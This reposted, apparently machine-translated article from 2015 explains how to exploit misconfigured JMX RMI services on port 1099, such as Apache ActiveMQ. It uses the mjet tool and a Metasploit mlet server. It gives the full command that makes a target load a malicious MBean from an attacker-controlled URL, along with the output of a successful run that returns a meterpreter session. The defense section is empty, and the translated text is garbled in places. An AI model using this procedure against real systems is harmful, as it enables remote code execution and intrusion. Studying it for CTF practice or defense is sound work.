Posted by millikan at 2020-02-25

16 Apr 2015 - Demon

[+] Author: Demon [+] Team: n0tr00t security team [+] From: [+] Create: 2015-04-16

Utilization method

View: Exploiting JMX RMI

The reason for writing this article is that one of the final questions of alictf is about @ cnbird's Linux penetration, which involves a machine opening 1099 port. After the game, many students said that they were interested in this way of utilization, so they sorted it out and made it convenient for the friends to consult later.

The original corresponding service of port 1099 is Apache ActiveMQ's support for JMX. However, due to improper configuration, an attacker can use the getmbeansfromurl method of to load a remote malicious MBean through this port, that is, arbitrary code can be executed remotely. Of course, this JMX utilization method can be used not only in ActiveMQ, but also in many services supporting JMX.

In the original text, the principle analysis of the vulnerability and the compilation of exploit are described in detail, and there will be no more details here. How to use this vulnerability to directly call and execute the meterpret payload in Metasploit? There has been a JMX utility called mjet written abroad, which can search for and transport gate on GitHub. The method is very detailed. First, build a Metasploit through a public network machine, start a Java mlet server module, and enable the target machine to load malicious code. Then use mjet.jar to expand. The specific commands are as follows:

java -jar mjet.jar -t target_ip -p 1099 -u http://attacker_ip:8080/mlet/

Attacker? IP is the IP of the machine with Metasploit installed in its public network. After execution, the following information will be returned if the exploit succeeds.

--------------------------------------------------- MJET - Mogwai Security JMX Exploitation Toolkit 0.1 --------------------------------------------------- [+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi:// ... [+] Connected: rmi:// 5 [+] Trying to create MLet bean... [+] Loaded [+] Loading malicious MBean from [+] Invoking: [+] Loaded class: metasploit.Metasploit [+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE [+] Invoking: [+] Done

The process of execution is clear at a glance. Then on the Java mlet server side, a metapreter session bounces back on the back end.

Defense plan

Reference resources